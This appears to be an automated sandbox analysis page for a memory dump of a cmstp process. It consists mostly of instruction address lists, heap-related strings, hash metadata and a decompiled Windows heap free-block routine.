0x050f6c90
0x050f6c93
0x00000000
0x00000000
0x050f6c99
0x050f6c9b
0x050f6c9d
0x050f6dae
0x00000000
0x050f6dae
0x050f6ca6
0x050f6ca6
0x050f6ca7
0x050f6ca7
0x050f6cb6
0x050f6cbb
0x00000000
0x050f6cbb
0x0513f060
0x00000000
0x0513f060
0x050f6c6b
0x050f5c27
0x050f5c2a
0x050f5c34
0x050f5c38
0x050f5c3a
0x050f68de
0x050f68e1
0x050f68e5
0x050f68e9
0x0513f00d
0x0513f011
0x0513f016
0x0513f016
0x050f68ef
0x050f68f5
0x050f68fc
0x0513f01f
0x050f6902
0x050f690b
0x050f690d
0x050f690d
0x050f6913
0x050f6913
0x050f6915
0x00000000
0x00000000
0x050f6917
0x050f691b
0x0513f026
0x050f6921
0x050f6921
0x050f6924
0x050f692a
0x050f692d
0x050f692f
0x050f692f
0x050f6932
0x050f6932
0x050f692d
0x050f6938
0x050f6942
0x050f6944
0x0513f02f
0x0513f031
0x00000000
0x00000000
0x00000000
0x00000000
0x050f6944
0x050f694a
0x050f694a
0x050f694d
0x050f6950
0x050f6952
0x050f6954
0x0513f03c
0x0513f046
0x050f695a
0x050f695a
0x050f695c
0x050f695f
0x050f6961
0x050f6961
0x050f6967
0x050f696a
0x050f6970
0x050f6972
0x00000000
0x050f6978
0x050f6978
0x050f6980
0x050f6980
0x050f6983
0x00000000
0x00000000
0x050f6b8a
0x050f6b8c
0x050f6b8e
0x050f6b9a
0x050f698b
0x050f698b
0x00000000
0x050f698b
0x050f6b90
0x050f6b90
0x050f6989
0x00000000
0x050f6989
0x050f6972
0x050f5c40
0x050f5c43
0x050f5c46
0x050f5c4c
0x050f5c52
0x050f5c55
0x050f5c57
0x0513efa2
0x00000000
0x050f5c60
0x050f5c60
0x050f5c60
0x050f5c63
0x050f5c65
0x050f5c6b
0x050f5c71
0x050f5c71
0x050f5c71
0x050f5dcb
0x050f5dcd
0x050f5dcf
0x050f6242
0x050f6242
0x050f6243
0x050f6243
0x00000000
0x050f5dd5
0x050f5dd5
0x050f5dd7
0x00000000
0x050f5dd7
0x050f5dcf
0x050f5c73
0x050f5c79
0x050f5c7e
0x050f5c81
0x050f5c84
0x050f5c87
0x050f5c89
0x050f64c3
0x050f5c8f
0x050f5c8f
0x050f5c92
0x050f5c95
0x050f5c97
0x050f5c9d
0x050f5ca0
0x050f5ca3
0x050f5ca8
0x050f5caa
0x050f5cb0
0x050f5cb3
0x050f5cb9
0x050f5cc8
0x050f5ccd
0x050f5ccf
0x0513ef31
0x0513ef40
0x0513ef48
0x050f5cd5
0x050f5cd5
0x050f5cd5
0x050f5cd8
0x050f5cd8
0x050f5ce1
0x050f5ce3
0x050f5ce9
0x050f5ceb
0x050f5ddf
0x050f5de1
0x050f5de1
0x050f5cf1
0x050f5cf3
0x050f5cf6
0x050f5cf9
0x050f5cfb
0x050f5d01
0x050f5d04
0x050f5d07
0x050f5d0c
0x050f5d0e
0x050f5d14
0x050f5d17
0x050f5d1d
0x050f5d2c
0x050f5d31
0x050f5d33
0x0513ef50
0x0513ef5f
0x0513ef67
0x050f5d39
0x050f5d39
0x050f5d39
0x050f5d3c
0x050f5d3c
0x050f5d45
0x050f5d47
0x050f5d4d
0x050f5d4f
0x050f5d52
0x050f64ca
0x050f5de4
0x050f5de4
0x050f5de6
0x050f62de
0x050f62de
0x050f62e0
0x050f62e3
0x00000000
0x050f62e3
0x050f5dec
0x050f5df2
0x050f5df2
0x050f5df5
0x050f5df5
0x050f5df7
0x00000000
0x00000000
0x050f6027
0x050f602b
0x0513efa9
0x050f6031
0x050f6031
0x050f6034
0x050f603a
0x050f603d
0x050f603f
0x050f603f
0x050f6042
0x050f6042
0x050f603d
0x050f6048
0x050f6052
0x050f6054
0x00000000
0x050f605a
0x0513efb2
0x0513efb4
0x00000000
0x0513efb4
0x050f6054
0x050f5dfd
0x050f5dfd
0x050f5e00
0x050f5e03
0x050f5e05
0x050f5e07
0x0513efbf
0x0513efc9
0x050f5e0d
0x050f5e0d
0x050f5e0f
0x050f5e12
0x050f5e14
0x050f5e14
0x050f5e1a
0x050f5e1d
0x050f5e23
0x050f5e26
0x050f5e28
0x00000000
0x050f5e2e
0x050f5e2e
0x050f5e31
0x050f5e31
0x050f5e34
0x050f5e36
0x00000000
0x00000000
0x050f6013
0x050f6015
0x050f6017
0x050f624e
0x050f624f
0x050f5e44
0x050f5e44
0x050f5e49
0x050f5e4c
0x050f5e4f
0x050f5e53
0x0513efd6
0x050f5e59
0x050f5e59
0x050f5e59
0x050f5e5c
0x050f5e68
0x050f5e6f
0x050f5e72
0x050f5e75
0x050f623a
0x050f623a
0x050f5e7b
0x050f5e7e
0x050f5e80
0x050f6265
0x050f6268
0x050f626b
0x050f626d
0x050f6276
0x050f6279
0x050f627d
0x050f6280
0x050f6285
0x050f6287
0x050f628d
0x050f6290
0x050f6296
0x050f62a5
0x050f62aa
0x050f62ac
0x0513efde
0x0513efed
0x0513eff8
0x0513eff8
0x050f62b2
0x050f62b5
0x050f62b5
0x050f62be
0x050f62c0
0x050f62c6
0x050f62c8
0x00000000
0x050f62ce
0x00000000
0x050f62ce
0x050f5e86
0x050f5e86
0x050f5e89
0x050f5e8f
0x050f5e92
0x050f5e92
0x050f5e96
0x050f5e9a
0x050f5ea0
0x050f5eb0
0x050f5eb0
0x050f5eb3
0x050f5eb3
0x050f5eb3
0x050f5eb3
0x00000000
0x050f5e96
0x050f5e80
0x050f601d
0x050f601f
0x050f601f
0x050f5e3c
0x050f5e42
0x00000000
0x050f5e42
0x050f5e28
0x050f5d58
0x050f5d5a
0x050f6123
0x050f6126
0x00000000
0x00000000
0x050f612c
0x050f612f
0x0513ef74
0x0513ef74
0x050f613b
0x050f613e
0x050f613e
0x050f6141
0x050f6143
0x00000000
0x00000000
0x050f6149
0x050f614c
0x050f614f
0x050f6151
0x050f6157
0x050f615a
0x050f615d
0x050f6162
0x050f6164
0x050f616a
0x050f616d
0x050f6173
0x050f6182
0x050f6187
0x050f6189
0x0513ef7c
0x0513ef8b
0x0513ef93
0x050f618f
0x050f618f
0x050f618f
0x050f6192
0x050f6192
0x050f619b
0x050f619d
0x050f61a3
0x050f61a5
0x050f68d2
0x00000000
0x050f61ab
0x050f61ab
0x050f61ae
0x00000000
0x050f61ae
0x050f61a5
0x00000000
0x050f613e
0x050f5d60
0x050f5d63
0x050f5d70
0x050f5d76
0x050f5d86
0x050f5d8e
0x050f5d8e
0x050f5d90
0x050f5d93
0x050f5d93
0x050f5d99
0x050f5d9f
0x050f5da1
0x00000000
0x00000000
0x050f5da7
0x050f5da9
0x050f62d3
0x050f62d5
0x00000000
0x00000000
0x050f62db
0x00000000
0x050f5daf
0x050f5daf
0x050f5db2
0x050f5db4
0x00000000
0x050f5db4
0x050f5da9
0x050f608e
0x050f6091
0x050f61f3
0x050f61f6
0x050f61f8
0x050f64bb
0x050f61fe
0x050f6201
0x050f6208
0x050f6208
0x050f6097
0x050f6097
0x050f609a
0x050f609c
0x050f62f8
0x050f60a2
0x050f60a2
0x050f60a2
0x050f609c
0x050f60ac
0x050f60ae
0x050f60b4
0x050f60b7
0x050f60bb
0x0513ef9b
0x0513ef9b
0x050f60c4
0x050f60c4
0x050f5ceb
0x00000000
0x050f5c89
0x050f5c57
0x050f5b93
0x050f5b59
0x050f658b
0x050f6590
0x050f6590
0x050f6590
0x050f6593
0x050f6595
0x00000000
0x00000000
0x050f6597
0x050f6599
0x050f659c
0x050f659e
0x050f65a1
0x050f65a8
0x050f65a8
0x00000000
0x050f65a8
0x050f65a3
0x050f65a3
0x050f65ab
0x050f65b6
0x050f65be
0x050f65c3
0x00000000
0x050f65c3
0x050f5991
0x050f5994
0x050f5997
0x050f599b
0x050f59a0
0x050f59aa
0x050f59ad
0x0513ed6f
0x0513ed74
0x0513ed74
0x050f59ad
0x050f59b3
0x050f59b6
0x050f59b9
0x0513edd9
0x0513eddd
0x0513edeb
0x0513edf1
0x0513edf1
0x00000000
0x0513eddd
0x050f59bf
0x050f59bf
0x050f59c2
0x050f59c5
0x050f59c7
0x050f59cd
0x050f59d0
0x050f59d6
0x050f59d8
0x050f59db
0x050f59dd
0x0513edbd
0x0513edbd
0x0513edc0
0x0513edc6
0x0513edcb
0x0513edd0
0x00000000
0x0513edd0
0x050f59e3
0x050f59e6
0x050f59e8
0x00000000
0x00000000
0x050f59ee
0x050f59f1
0x050f59f7
0x050f59fa
0x050f59fc
0x050f5b23
0x050f5b23
0x050f5b29
0x050f5b2f
0x050f5b31
0x050f5b34
0x050f5b38
0x050f689f
0x050f68a4
0x050f68a6
0x00000000
0x00000000
0x0513edad
0x0513edaf
0x0513edb4
0x00000000
0x0513edb4
0x050f5b3e
0x050f5b3e
0x00000000
0x050f5a02
0x050f5a02
0x050f5a05
0x050f5a05
0x050f5a08
0x050f5a0a
0x00000000
0x00000000
0x050f5db7
0x050f5db9
0x050f5dbb
0x050f6218
0x050f6218
0x00000000
0x050f5dc1
0x050f5dc1
0x050f5dc3
0x00000000
0x050f5dc3
0x050f5dbb
0x050f5a10
0x050f5a19
0x050f5a1e
0x050f5a21
0x050f5a24
0x050f5a28
0x0513ed7e
0x050f5a2e
0x050f5a2e
0x050f5a2e
0x050f5a30
0x050f5a37
0x050f5a3d
0x050f5a3f
0x050f5a44
0x050f5a47
0x050f5a4a
0x050f5a4d
0x050f5a4d
0x050f5a50
0x050f5a53
0x050f5a55
0x050f6210
0x050f6210
0x050f5a5e
0x050f5a61
0x00000000
0x050f5a67
0x050f5a67
0x050f5a6d
0x050f5a70
0x050f5a72
0x050f5a75
0x050f5a75
0x050f5a7e
0x050f5a84
0x050f5a87
0x050f5a89
0x050f5a8c
0x050f6220
0x050f6223
0x050f6226
0x050f6229
0x050f65e5
0x00000000
0x050f65e5
0x050f622f
0x050f5b08
0x050f5b08
0x050f5b1b
0x050f5b20
0x050f5b20
0x050f5b20
0x00000000
0x050f5b20
0x050f5a92
0x050f5a95
0x050f5a98
0x050f5afb
0x050f5b01
0x00000000
0x050f5b01
0x050f5a9a
0x050f5a9d
0x050f5aa0
0x050f5aa2
0x050f5aa8
0x050f5aab
0x050f5aaf
0x050f5ab4
0x050f5ab6
0x050f5abc
0x050f5abf
0x050f5ac2
0x050f5ad1
0x050f5ad6
0x050f5ad8
0x0513ed86
0x0513ed95
0x0513ed9d
0x0513ed9d
0x050f5ade
0x050f5ae1
0x050f5ae1
0x050f5aea
0x050f5aea
0x050f5aec
0x050f5af2
0x050f64f8
0x050f64fb
0x00000000
0x050f5af8
0x050f5af8
0x00000000
0x050f5af8
0x050f5af2
0x050f5a61
0x050f59fc
0x050f58d4
0x050f58cc
0x050f68c0
0x050f68c0
0x00000000
0x050f68c0
0x050f57ed
0x050f61c0
0x050f61c2
0x050f61c2
0x00000000
0x050f57e0
0x050f57b7
0x050f57bb
0x050f6307
0x050f630a
0x050f630d
0x050f6311
0x050f6316
0x050f6320
0x050f6323
0x0513ec54
0x0513ec59
0x0513ec59
0x050f6323
0x050f6329
0x050f6329
0x050f632c
0x050f6332
0x050f6334
0x050f6337
0x050f633a
0x050f633d
0x050f633f
0x050f6342
0x050f6344
0x0513ecc0
0x0513ecc0
0x0513ecc6
0x0513eccb
0x00000000
0x050f634a
0x050f634a
0x050f634c
0x00000000
0x00000000
0x050f6355
0x050f6358
0x050f635e
0x050f6361
0x050f6363
0x050f6496
0x050f6496
0x050f6499
0x050f649c
0x050f649e
0x050f64a1
0x050f64a5
0x050f6c01
0x050f6c06
0x050f6c08
0x00000000
0x00000000
0x0513ecb7
0x0513ecb9
0x0513ecd0
0x0513ecd0
0x0513ecda
0x0513ece4
0x0513eceb
0x0513ecfb
0x00000000
0x0513ecfb
0x050f64ab
0x050f64ab
0x00000000
0x050f64ab
0x050f6369
0x050f6370
0x050f6370
0x050f6373
0x050f6375
0x00000000
0x00000000
0x050f6718
0x050f671a
0x050f671c
0x0513ec63
0x0513ec63
0x00000000
0x0513ec63
0x050f6722
0x050f6724
0x050f6724
0x050f637b
0x050f6384
0x050f6389
0x050f638c
0x050f638f
0x050f6393
0x0513ec6b
0x050f6399
0x050f6399
0x050f6399
0x050f639b
0x050f63a2
0x050f63a8
0x050f63aa
0x050f63af
0x050f63b5
0x050f63b8
0x050f63bb
0x050f63be
0x050f63be
0x050f63c1
0x050f63c4
0x050f63c6
0x050f6bf5
0x050f6bf5
0x050f63d2
0x050f63d8
0x00000000
0x050f63de
0x050f63de
0x050f63e4
0x050f63e7
0x050f65ec
0x050f65ef
0x050f65f2
0x050f65f2
0x050f63ed
0x050f63f0
0x050f63f9
0x050f63fc
0x050f63ff
0x050f6402
0x0513ec95
0x0513ec98
0x0513ec9b
0x0513eca4
0x00000000
0x0513eca4
0x0513ec9d
0x00000000
0x050f6408
0x050f6408
0x050f640b
0x050f646e
0x050f6474
0x050f647b
0x050f647b
0x050f648e
0x050f6493
0x050f6493
0x050f6493
0x00000000
0x050f6493
0x050f640d
0x050f6410
0x050f6413
0x050f6415
0x050f641b
0x050f641e
0x050f6422
0x050f6427
0x050f6429
0x050f642f
0x050f6432
0x050f6438
0x050f6447
0x050f644c
0x050f644e
0x0513ec73
0x0513ec82
0x0513ec8d
0x0513ec8d
0x050f6454
0x050f6454
0x050f645d
0x050f645d
0x050f645f
0x050f6465
0x050f6706
0x050f6709
0x00000000
0x050f646b
0x050f646b
0x00000000
0x050f646b
0x050f6465
0x050f6402
0x050f63d8
0x050f6344
0x00000000
0x050f57bb
0x050f572e
0x050f5731
0x050f6509
0x050f650f
0x00000000
0x00000000
0x050f6515
0x050f651c
0x0513ec26
0x0513ec2d
0x00000000
0x00000000
0x0513ec33
0x050f6522
0x050f6529
0x050f652f
0x050f652f
0x00000000
0x050f6529
0x050f5737
0x050f573d
0x00000000
0x00000000
0x050f574a
0x050f574c
0x050f5755
0x050f5758
0x050f5764
0x050f57ad
0x050f57ad
0x00000000
0x050f57ad
0x050f576c
0x050f576f
0x050f5775
0x050f5779
0x050f5783
0x050f66a6
0x050f66a6
0x050f66a9
0x050f66ab
0x0513ec38
0x050f66b1
0x050f66b1
0x050f66b1
0x050f66b3
0x050f66ba
0x050f69ac
0x050f66c0
0x050f66c0
0x050f66c0
0x050f66cb
0x050f66ce
0x050f66d3
0x050f66d6
0x050f69b3
0x050f69ba
0x0513ec42
0x0513ec49
0x00000000
0x00000000
0x0513ec4f
0x050f69c0
0x050f66dc
0x050f66dc
0x050f66df
0x050f66ea
0x050f66ed
0x050f66ef
0x050f66ef
0x00000000
0x050f66d6
0x050f578f
0x050f669c
0x00000000
0x050f57a3
0x050f57a3
0x00000000
0x050f57a3
0x050f56c4
0x050f56c4
0x050f56ca
0x050f56d4
0x050f56d9
0x050f6856
0x050f6859
0x050f685c
0x050f68c7
0x00000000
0x050f68c7
0x050f685e
0x050f6868
0x050f686f
0x0513ebf3
0x0513ebfd
0x0513ec07
0x0513ec0e
0x0513ec1e
0x050f5fcf
0x050f5fcf
0x050f5fd6
0x050f5fe1
0x050f5fe4
0x050f5fe6
0x0513f58f
0x0513f592
0x00000000
0x00000000
0x0513f5a1
0x050f5ff1
0x050f5ff1
0x050f5ff4
0x050f5ff7
0x0513f5ab
0x0513f5ad
0x0513f5b3
0x0513f5b6
0x0513f5b8
0x0513f5c9
0x0513f5c9
0x0513f5b8
0x0513f5ad
0x050f5ffd
0x050f5fff
0x050f6002
0x050f6010
0x050f6010
0x050f5fec
0x050f5fec
0x00000000
0x050f5fec
0x050f6875
0x050f6885
0x050f688f
0x050f6891
0x00000000
0x050f56df
0x050f56df
0x050f56e2
0x050f56e5
0x050f56ec
0x050f56ec
0x050f56f6
0x050f56fc
0x050f56fc
0x050f5700
0x050f570b
0x050f69cc
0x050f69ce
0x050f69ce
0x050f5711
0x00000000
0x050f5711
0x050f56d9
0x050f56c2

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 0513EEA5, 0513F123
HEAP[%wZ]: , xrefs: 0513EE7C, 0513F0FA
HEAP: , xrefs: 0513EE8B, 0513F109

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: fc2593bad8f6e30be59e0521accd60a9dde01fd1104a935bfe01a33414c2c404
Instruction ID: f4fbed789e94128a2415915711f1ef0f0991097a2e9b5db7b9e6f09567a1ab20
Opcode Fuzzy Hash: fc2593bad8f6e30be59e0521accd60a9dde01fd1104a935bfe01a33414c2c404
Instruction Fuzzy Hash: B8239D70A04215DFDB28CF68D894BBDBBF2BF49304F1481A9D94AAB741D735A846CF90

Uniqueness

Uniqueness Score: -1.00%

Function 050FA830 Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E050FA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x51c8748 - 1;
					if( *0x51c8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E050DB150();
									_t260 = _t257 + 4;
								} else {
									E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E050DB150();
								_t257 = _t260 + 4;
								__eflags =  *0x51c7bc8;
								if(__eflags == 0) {
									E05192073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0519A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0512D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E050FAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0519A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0519A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x51c8748 - 1;
					if( *0x51c8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E050DB150();
							} else {
								E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E050DB150();
							__eflags =  *0x51c7bc8;
							if(__eflags == 0) {
								_t131 = E05192073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x050fa83a
0x050fa83c
0x050fa83e
0x050fa841
0x050fa844
0x050fa84a
0x050faa53
0x050faa59
0x050faa59
0x050fa858
0x050fa85e
0x050faaf5
0x050faafc
0x0514229e
0x051422a2
0x051422a8
0x051422b3
0x051422b5
0x051422bb
0x051422c1
0x051422c5
0x051422e6
0x051422eb
0x051422f0
0x051422c7
0x051422dc
0x051422e1
0x051422e1
0x051422f3
0x051422f8
0x051422fd
0x05142300
0x05142307
0x0514230e
0x0514230e
0x05142313
0x05142313
0x051422b5
0x051422a2
0x050faafc
0x050fa864
0x050fa869
0x050faa5c
0x050faa5e
0x050fa86f
0x050fa87f
0x050fa885
0x050fa885
0x050fa88b
0x050fa890
0x050fa896
0x050fab0c
0x050fab0f
0x050fab15
0x05142320
0x05142320
0x050fab1b
0x050fa89c
0x050fa89f
0x050fa8a2
0x050fa8a2
0x050fa8a5
0x050fa8af
0x050fa8b3
0x050fa8b8
0x050faa66
0x050fa8be
0x050fa8c5
0x050fa8c6
0x050fa8ce
0x05142328
0x05142332
0x05142337
0x05142337
0x050fa8ce
0x050fa8d4
0x050fa8d8
0x050fa8db
0x050fa8de
0x050fa8e1
0x050fa8e5
0x050fa8e8
0x050fa8f0
0x050fa8f3
0x0514234c
0x05142350
0x05142355
0x05142359
0x05142359
0x050fa8f9
0x050fa901
0x050faae4
0x050faae4
0x050faaea
0x00000000
0x050fa907
0x050fa90a
0x050fa91d
0x050fa91d
0x00000000
0x050fa910
0x050fa910
0x050fa910
0x050fa914
0x050fa924
0x050fa924
0x050fa924
0x050fa924
0x050fa916
0x050fa91b
0x00000000
0x00000000
0x00000000
0x050fa91b
0x050fa925
0x050fa925
0x050fa932
0x050fa936
0x050fa93c
0x050fa93c
0x050fa93c
0x050fab22
0x050fab24
0x050fab27
0x050fab27
0x050fa942
0x050fa944
0x050faaba
0x050faabd
0x050faac0
0x050faac0
0x050faac2
0x050fab2f
0x050faac4
0x050faac4
0x050faac7
0x050faaca
0x050faacc
0x050faace
0x050faace
0x050faace
0x050faad1
0x050faad1
0x050faad7
0x050faad9
0x00000000
0x00000000
0x05142361
0x05142369
0x0514236b
0x00000000
0x05142371
0x00000000
0x05142371
0x00000000
0x0514236b
0x050faac0
0x050fa94a
0x050fa94a
0x050fa94d
0x050fa94d
0x050fa950
0x050fa954
0x05142376
0x05142380
